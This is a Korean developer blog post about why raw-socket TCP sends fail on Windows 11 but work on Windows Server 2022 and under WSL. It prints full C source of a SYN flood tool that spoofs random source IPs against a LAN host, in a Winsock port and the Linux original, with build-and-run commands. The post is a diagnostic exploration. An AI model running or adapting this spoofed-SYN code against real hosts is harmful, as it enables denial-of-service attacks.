Microsoft MVP성태의 닷넷 이야기
C/C++: 161. Windows 11 환경에서 raw socket 테스트하는 방법 [링크 복사], [링크+제목 복사]
조회: 4970
글쓴 사람
정성태 (techsharer at outlook.com)
홈페이지
첨부 파일
(연관된 글이 1개 있습니다.)

Windows 11 환경에서 raw socket 테스트하는 방법

이상하군요, ^^; 간단하게 raw socket을 테스트하려고 다음의 코드를,

adamalston/SYN-Flood
; https://github.com/adamalston/SYN-Flood

Windows Socket으로 변형해,

// https://github.com/adamalston/SYN-Flood/blob/master/tcp_syn_flood.c
// 또는 파이썬 2.x가 친숙하다면,
// https://github.com/gabrielpereirapinheiro/syn_flood/blob/master/synflood.py

#define _WINSOCK_DEPRECATED_NO_WARNINGS

#include <iostream>
#include <WinSock2.h>
#include <ws2tcpip.h>

#pragma comment(lib, "ws2_32.lib")

#define DEST_IP "192.168.100.50"
#define DEST_PORT 15501 // Attack the web server
#define PACKET_LEN 1500

// IP Header
struct ipheader
{
    unsigned char iph_ihl : 4,       // IP header length
        iph_ver : 4;                 // IP version
    unsigned char iph_tos;           // Type of service
    unsigned short int iph_len;      // IP Packet length (data + header)
    unsigned short int iph_ident;    // Identification
    unsigned short int iph_flag : 3, // Fragmentation flags
        iph_offset : 13;             // Flags offset
    unsigned char iph_ttl;           // Time to Live
    unsigned char iph_protocol;      // Protocol type
    unsigned short int iph_chksum;   // IP datagram checksum
    struct in_addr iph_sourceip;     // Source IP address
    struct in_addr iph_destip;       // Destination IP address
};

// TCP Header
struct tcpheader
{
    u_short tcp_sport; // source port
    u_short tcp_dport; // destination port
    u_int tcp_seq;     // sequence number
    u_int tcp_ack;     // acknowledgement number
    u_char tcp_offx2;  // data offset, rsvd
#define TH_OFF(th) (((th)->tcp_offx2 & 0xf0) >> 4)
    u_char tcp_flags;
#define TH_FIN 0x01
#define TH_SYN 0x02
#define TH_RST 0x04
#define TH_PUSH 0x08
#define TH_ACK 0x10
#define TH_URG 0x20
#define TH_ECE 0x40
#define TH_CWR 0x80
#define TH_FLAGS (TH_FIN | TH_SYN | TH_RST | TH_ACK | TH_URG | TH_ECE | TH_CWR)
    u_short tcp_win; // window
    u_short tcp_sum; // checksum
    u_short tcp_urp; // urgent pointer
};

// Psuedo TCP header
struct pseudo_tcp
{
    unsigned saddr, daddr;
    unsigned char mbz;
    unsigned char ptcl;
    unsigned short tcpl;
    struct tcpheader tcp;
    char payload[1500];
};

/*****************************************************
   Given a buffer of data, calculate the checksum
*****************************************************/
unsigned short in_cksum(unsigned short* buf, int length)
{
    unsigned short* w = buf;
    int nleft = length;
    int sum = 0;
    unsigned short temp = 0;

    /*
    * The algorithm uses a 32 bit accumulator (sum), adds
    * sequential 16 bit words to it, and at the end, folds back all the
    * carry bits from the top 16 bits into the lower 16 bits.
    */
    while (nleft > 1) {
        sum += *w++;
        nleft -= 2;
    }

    /* treat the odd byte at the end, if any */
    if (nleft == 1) {
        *(u_char*)(&temp) = *(u_char*)w;
        sum += temp;
    }

    /* add back carry outs from top 16 bits to low 16 bits */
    sum = (sum >> 16) + (sum & 0xffff);     // add hi 16 to low 16 
    sum += (sum >> 16);                     // add carry 
    return (unsigned short)(~sum);
}

/****************************************************************************
  TCP checksum is calculated on the pseudo header, which includes the
  the TCP header and data, plus some part of the IP header. Therefore,
  we need to construct the pseudo header first.
*****************************************************************************/
unsigned short calculate_tcp_checksum(struct ipheader* ip)
{
    struct tcpheader* tcp = (struct tcpheader*)((u_char*)ip +
        sizeof(struct ipheader));

    int tcp_len = ntohs(ip->iph_len) - sizeof(struct ipheader);

    /* pseudo tcp header for the checksum computation */
    struct pseudo_tcp p_tcp;
    memset(&p_tcp, 0x0, sizeof(struct pseudo_tcp));

    p_tcp.saddr = ip->iph_sourceip.s_addr;
    p_tcp.daddr = ip->iph_destip.s_addr;
    p_tcp.mbz = 0;
    p_tcp.ptcl = IPPROTO_TCP;
    p_tcp.tcpl = htons(tcp_len);
    memcpy(&p_tcp.tcp, tcp, tcp_len);

    return  (unsigned short)in_cksum((unsigned short*)&p_tcp, tcp_len + 12);
}

// unsigned short calculate_tcp_checksum(struct ipheader* ip);

// Given an IP packet, send it out using a raw socket.
void send_raw_ip_packet(struct ipheader* ip)
{
    struct sockaddr_in dest_info;
    int enable = 1;

    // Step 1: Create a raw network socket.
    int sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    // int sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
    if (sock < 0)
    {
        printf("socket failed: %d\n", WSAGetLastError());
        return;
    }

    printf("raw socket opened\n");

    // Step 2: Set socket option.
    int result = setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (const char*)&enable, sizeof(enable));
    if (sock < 0)
    {
        printf("setsockopt failed: %d\n", WSAGetLastError());
        return;
    }

    // Step 3: Provide needed information about destination.
    dest_info.sin_family = AF_INET;
    dest_info.sin_addr = ip->iph_destip;

    // Step 4: Send the packet out.
    result = sendto(sock, (const char *)ip, ntohs(ip->iph_len), 0, (struct sockaddr*)&dest_info, sizeof(dest_info));
    printf("sendto: %d\n", result);

    printf("Press any key to exit...");
    getchar();

    closesocket(sock);
}

int main()
{
    char buffer[PACKET_LEN];
    struct ipheader* ip = (struct ipheader*)buffer;
    struct tcpheader* tcp = (struct tcpheader*)(buffer + sizeof(struct ipheader));

    WORD wVersionRequested;
    WSADATA wsaData;
    int err;

    wVersionRequested = MAKEWORD(1, 1);

    WSAStartup(wVersionRequested, &wsaData);

    srand(time(0)); // Initialize the seed for random # generation.

    {
        memset(buffer, 0, PACKET_LEN);
        // Step 1: Fill in the TCP header.
        tcp->tcp_sport = rand();             // Use random source port
        tcp->tcp_dport = htons(DEST_PORT);
        tcp->tcp_seq = rand();               // Use random sequence #
        tcp->tcp_offx2 = 0x50;
        tcp->tcp_flags = TH_SYN;             // Enable the SYN bit
        tcp->tcp_win = htons(20000);
        tcp->tcp_sum = 0;

        // Step 2: Fill in the IP header.
        ip->iph_ver = 4;                 // Version (IPV4)
        ip->iph_ihl = 5;                 // Header length
        ip->iph_ttl = 50;                    // Time to live
        
        ip->iph_sourceip.s_addr = rand();    // Use a random IP address
        ip->iph_destip.s_addr = inet_addr(DEST_IP);
        ip->iph_protocol = IPPROTO_TCP;  // The value is 6.
        ip->iph_len = htons(sizeof(struct ipheader) + sizeof(struct tcpheader));

        // Calculate tcp checksum
        tcp->tcp_sum = calculate_tcp_checksum(ip);

        // Step 3: Finally, send the spoofed packet
        send_raw_ip_packet(ip);
    }

    WSACleanup();
}

관리자 권한으로 실행했더니,

// 관리자 권한으로 실행

c:\temp> ConsoleApplication1.exe
raw socket opened
sendto: 40
Press any key to exit...

딱히 sendto API 호출까지의 오류는 없지만 동작하지 않습니다. 재미있는 건, 동일한 exe 빌드를 Windows Server 2022에 복사해 실행하면 잘 됩니다. ^^;

이에 대해 검색해서 찾게 된 아래의 문서를 보면,

Limitations on Raw Sockets
; https://learn.microsoft.com/en-us/windows/win32/winsock/tcp-ip-raw-sockets-2#limitations-on-raw-sockets

Raw socket은 윈도우 관리자 권한으로 실행하는 경우 잘 동작하지만, Windows XP SP2 이상의 환경에서는,

Limitations on Raw Sockets

On Windows 7, Windows Vista, Windows XP with Service Pack 2 (SP2), and Windows XP with Service Pack 3 (SP3), the ability to send traffic over raw sockets has been restricted in several ways:

...


제약이 있다고 설명합니다. 하지만 그 제약이 딱히 위의 예제와는 별다른 관련이 없습니다.

  • TCP data cannot be sent over raw sockets.
  • UDP datagrams with an invalid source address cannot be sent over raw sockets. The IP source address for any outgoing UDP datagram must exist on a network interface or the datagram is dropped. This change was made to limit the ability of malicious code to create distributed denial-of-service attacks and limits the ability to send spoofed packets (TCP/IP packets with a forged source IP address).
  • A call to the bind function with a raw socket for the IPPROTO_TCP protocol is not allowed.

제가 사용한 코드는 TCP의 data가 비어 있는, 말 그대로 IP+TCP 헤더만 보내는 경우입니다. 또한, UDP 패킷도 아니고 bind 함수를 사용한 경우도 아닙니다.

아마도 "TCP data"라는 것이 "header"도 포함하는 의미가 아닐까 예상합니다. 즉, 순수하게 IP의 header와 TCP에 해당하지 않은 data만을 보내는 것을... 의미하는 것 같습니다. (혹시 이에 대해 자세히 알고 계신 분은 덧글 부탁드립니다.)




결국 Windows 11에서는 raw socket을 사용해 TCP 테스트를 할 수 없습니다. 단지, 굳이 해야 한다면 WSL을 이용해 우회하는 것은 가능합니다. 재미있게도, Windows 11 환경이지만 WSL로 위의 소스 코드를 테스트하면 잘 동작합니다.

$ git clone https://github.com/adamalston/SYN-Flood.git
$ cd SYN-Flood/
$ gedit tcp_syn_flood.c
..[대충 자신의 네트워크 상황에 맞게 편집해 주고]...

$ gcc tcp_syn_flood.c
$ sudo ./a.out

$ cat tcp_syn_flood.c

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <arpa/inet.h>
#include "header.h"

#define DEST_IP "192.168.100.50"
#define DEST_PORT 15501 // Attack the web server
#define PACKET_LEN 1500

/*****************************************************
   Given a buffer of data, calculate the checksum
*****************************************************/
unsigned short in_cksum(unsigned short* buf, int length)
{
    unsigned short* w = buf;
    int nleft = length;
    int sum = 0;
    unsigned short temp = 0;

    /*
    * The algorithm uses a 32 bit accumulator (sum), adds
    * sequential 16 bit words to it, and at the end, folds back all the
    * carry bits from the top 16 bits into the lower 16 bits.
    */
    while (nleft > 1) {
        sum += *w++;
        nleft -= 2;
    }

    /* treat the odd byte at the end, if any */
    if (nleft == 1) {
        *(u_char*)(&temp) = *(u_char*)w;
        sum += temp;
    }

    /* add back carry outs from top 16 bits to low 16 bits */
    sum = (sum >> 16) + (sum & 0xffff);     // add hi 16 to low 16 
    sum += (sum >> 16);                     // add carry 
    return (unsigned short)(~sum);
}

/****************************************************************************
  TCP checksum is calculated on the pseudo header, which includes the
  the TCP header and data, plus some part of the IP header. Therefore,
  we need to construct the pseudo header first.
*****************************************************************************/
unsigned short calculate_tcp_checksum(struct ipheader* ip)
{
    struct tcpheader* tcp = (struct tcpheader*)((u_char*)ip +
        sizeof(struct ipheader));

    int tcp_len = ntohs(ip->iph_len) - sizeof(struct ipheader);

    /* pseudo tcp header for the checksum computation */
    struct pseudo_tcp p_tcp;
    memset(&p_tcp, 0x0, sizeof(struct pseudo_tcp));

    p_tcp.saddr = ip->iph_sourceip.s_addr;
    p_tcp.daddr = ip->iph_destip.s_addr;
    p_tcp.mbz = 0;
    p_tcp.ptcl = IPPROTO_TCP;
    p_tcp.tcpl = htons(tcp_len);
    memcpy(&p_tcp.tcp, tcp, tcp_len);

    return  (unsigned short)in_cksum((unsigned short*)&p_tcp, tcp_len + 12);
}

// Given an IP packet, send it out using a raw socket.
void send_raw_ip_packet(struct ipheader *ip)
{
    struct sockaddr_in dest_info;
    int enable = 1;

    // Step 1: Create a raw network socket.
    int sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);

    // Step 2: Set socket option.
    setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &enable, sizeof(enable));

    // Step 3: Provide needed information about destination.
    dest_info.sin_family = AF_INET;
    dest_info.sin_addr = ip->iph_destip;

    // Step 4: Send the packet out.
    sendto(sock, ip, ntohs(ip->iph_len), 0, (struct sockaddr *)&dest_info, sizeof(dest_info));
    
    getchar();
    close(sock);
}

// Spoof a TCP SYN packet.
int main()
{
    char buffer[PACKET_LEN];
    struct ipheader *ip = (struct ipheader *)buffer;
    struct tcpheader *tcp = (struct tcpheader *)(buffer + sizeof(struct ipheader));

    srand(time(0)); // Initialize the seed for random # generation.

    // while (1)
    {
        memset(buffer, 0, PACKET_LEN);
        // Step 1: Fill in the TCP header.
        tcp->tcp_sport = rand();             // Use random source port
        tcp->tcp_dport = htons(DEST_PORT);
        tcp->tcp_seq = rand();               // Use random sequence #
        tcp->tcp_offx2 = 0x50;
        tcp->tcp_flags = TH_SYN;             // Enable the SYN bit
        tcp->tcp_win = htons(20000);
        tcp->tcp_sum = 0;

        // Step 2: Fill in the IP header.
        ip->iph_ver = 4;                 // Version (IPV4)
        ip->iph_ihl = 5;                 // Header length
        ip->iph_ttl = 50;                    // Time to live
        ip->iph_sourceip.s_addr = rand();    // Use a random IP address

        ip->iph_destip.s_addr = inet_addr(DEST_IP);
        ip->iph_protocol = IPPROTO_TCP;  // The value is 6.
        ip->iph_len = htons(sizeof(struct ipheader) + sizeof(struct tcpheader));

        // Calculate tcp checksum
        tcp->tcp_sum = calculate_tcp_checksum(ip);

        // Step 3: Finally, send the spoofed packet
        send_raw_ip_packet(ip);
    }

    return 0;
}

아니면, Windows Server 버전에서 테스트하거나!

(첨부 파일은 이 글의 예제 코드를 포함합니다.)




[이 글에 대해서 여러분들과 의견을 공유하고 싶습니다. 틀리거나 미흡한 부분 또는 의문 사항이 있으시면 언제든 댓글 남겨주십시오.]

[연관 글]






[최초 등록일: ]
[최종 수정일: 10/31/2022]

Creative Commons License
이 저작물은 크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이센스에 따라 이용하실 수 있습니다.
by SeongTae Jeong, mailto:techsharer at outlook.com

비밀번호

댓글 작성자
 




1  2  3  4  5  6  7  8  9  10  11  12  13  [14]  15  ...
NoWriterDateCnt.TitleFile(s)
13241정성태2/3/20233236디버깅 기술: 188. ASP.NET Web Application (.NET Framework) 프로젝트의 숨겨진 예외 - System.IO.FileNotFoundException
13240정성태2/1/20233348디버깅 기술: 187. ASP.NET Web Application (.NET Framework) 프로젝트의 숨겨진 예외 - System.Web.HttpException
13239정성태2/1/20233008디버깅 기술: 186. C# - CacheDependency의 숨겨진 예외 - System.Web.HttpException
13238정성태1/31/20234822.NET Framework: 2092. IIS 웹 사이트를 TLS 1.2 또는 TLS 1.3 프로토콜로만 운영하는 방법
13237정성태1/30/20234446.NET Framework: 2091. C# - 웹 사이트가 어떤 버전의 TLS/SSL을 지원하는지 확인하는 방법
13236정성태1/29/20234214개발 환경 구성: 663. openssl을 이용해 인트라넷 IIS 사이트의 SSL 인증서 생성
13235정성태1/29/20233803개발 환경 구성: 662. openssl - 윈도우 환경의 명령행에서 SAN 적용하는 방법
13234정성태1/28/20234753개발 환경 구성: 661. dnSpy를 이용해 소스 코드가 없는 .NET 어셈블리의 코드를 변경하는 방법 [1]
13233정성태1/28/20236026오류 유형: 840. C# - WebClient로 https 호출 시 "The request was aborted: Could not create SSL/TLS secure channel" 예외 발생
13232정성태1/27/20234081스크립트: 43. uwsgi의 --processes와 --threads 옵션
13231정성태1/27/20233064오류 유형: 839. python - TypeError: '...' object is not callable
13230정성태1/26/20233358개발 환경 구성: 660. WSL 2 내부로부터 호스트 측의 네트워크로 UDP 데이터가 1개의 패킷으로만 제한되는 문제
13229정성태1/25/20234213.NET Framework: 2090. C# - UDP Datagram의 최대 크기
13228정성태1/24/20234374.NET Framework: 2089. C# - WMI 논리 디스크가 속한 물리 디스크의 정보를 얻는 방법 [2]파일 다운로드1
13227정성태1/23/20234065개발 환경 구성: 659. Windows - IP MTU 값을 바꿀 수 있을까요? [1]
13226정성태1/23/20233783.NET Framework: 2088. .NET 5부터 지원하는 GetRawSocketOption 사용 시 주의할 점
13225정성태1/21/20233155개발 환경 구성: 658. Windows에서 실행 중인 소켓 서버를 다른 PC 또는 WSL에서 접속할 수 없는 경우
13224정성태1/21/20233433Windows: 221. Windows - Private/Public/Domain이 아닌 네트워크 어댑터 단위로 방화벽을 on/off하는 방법
13223정성태1/20/20233657오류 유형: 838. RDP 연결 오류 - The two computers couldn't connect in the amount of time allotted
13222정성태1/20/20233361개발 환경 구성: 657. WSL - DockerDesktop.vhdx 파일 위치를 옮기는 방법
13221정성태1/19/20233544Linux: 57. C# - 리눅스 프로세스 메모리 정보파일 다운로드1
13220정성태1/19/20233697오류 유형: 837. NETSDK1045 The current .NET SDK does not support targeting .NET ...
13219정성태1/18/20233236Windows: 220. 네트워크의 인터넷 접속 가능 여부에 대한 판단 기준
13218정성태1/17/20233184VS.NET IDE: 178. Visual Studio 17.5 (Preview 2) - 포트 터널링을 이용한 웹 응용 프로그램의 외부 접근 허용
13217정성태1/13/20233738디버깅 기술: 185. windbg - 64비트 운영체제에서 작업 관리자로 뜬 32비트 프로세스의 덤프를 sos로 디버깅하는 방법
13216정성태1/12/20234008디버깅 기술: 184. windbg - 32비트 프로세스의 메모리 덤프인 경우 !peb 명령어로 나타나지 않는 환경 변수
1  2  3  4  5  6  7  8  9  10  11  12  13  [14]  15  ...